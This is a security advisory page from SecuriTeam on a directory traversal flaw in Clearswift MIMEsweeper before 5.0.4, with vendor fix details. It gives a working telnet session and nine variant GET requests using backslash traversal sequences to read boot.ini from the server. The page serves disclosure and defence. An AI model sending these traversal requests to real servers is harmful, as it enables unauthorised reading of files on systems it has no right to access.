SecuriTeam - Clearswift MIMEsweeper Directory Traversal Vulnerability

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

MIMEsweeper is "a family of products designed to implement email and web communications e-policies. MIMEsweeper delivers the capabilities for organizations to protect themselves against email and web based threats, meet legal and regulatory requirements, implement productivity saving policies and manage the intellectual property passing through their network".

A vulnerability in the product allows attackers to retrieve files that would otherwise be inaccessible through a directory traversal vulnerability.

Credit:
The information has been provided by Pierre Kroma.

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* Clearswift MIMEsweeper versions prior to 5.0.4

Immune Systems:
* Clearswift MIMEsweeper version 5.0.4 or newer

It is possible to read arbitrary files on the remote server by pre-pending /foobar/\../\../ in front on the file name.

Example:
telnet xx.xx.xx.xx 80
Trying xx.xx.xx.xx...
Connected to xx.xx.xx.xx.
Escape character is '^]'.
GET /foobar/..\\..\\..\\..\\..\\..\\boot.ini HTTP/1.0

HTTP/1.0 200 Ok
Date: Do, 27 Jul 2004 14:30:07 GMT
Server: Clearswift Web Server
Content-length: 186
Content-type: application/octet-stream

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect
Connection closed by foreign host.

Here are some several examples:
GET /foobar/..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar/\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar//..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar//..\\..//..\\..//boot.ini HTTP/1.0
GET /foobar/\../\../\../\../\boot.ini HTTP/1.0
GET /foobar/../../../../boot.ini HTTP/1.0
GET /foobar\..\..\..\..\boot.ini HTTP/1.0

Impact:
This vulnerability can be used to retrieve any file from the portion where the Clearswift web server is installed. The number of "/","\",".." characters will depend on the ServerRoot (location of the virtual / directory) setting.

Vendor Status:
Clearswift has fixed the vulnerability in version 5.0.4 or newer.

	LedgerSMB Multiple Vulnerabilities
	Kaspersky Lab Multiple Products Local Privilege Escalation Vulnerability
	Piwik Cookie Unserialize Vulnerability
	Invision Power Board SQL PHP File Inclusion and SQL Injection
	U.S. Defense Information Systems Agency (DISA) Unix Security Readiness Review (SRR) Vulnerability
	DevIL DICOM Buffer Overflow Vulnerability
	Marvell Driver Multiple Information Element Overflows
	HP Data Protector Express and Single Server Edition (SSE) DoS and Code Execution
	HP Color LaserJet Printers Unauthorized Access to Data and DoS
	KDE KDELibs Remote Array Overrun with Arbitrary Code Execution
	Gimp BMP Image Parsing Integer Overflow Vulnerability
	Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation
	WordPress Unrestricted File Upload Arbitrary PHP Code Execution
	Atheros Driver Reserved Frame DoS Vulnerability
	McAfee Security Manager Authentication Bypass and Session Hijacking Vulnerability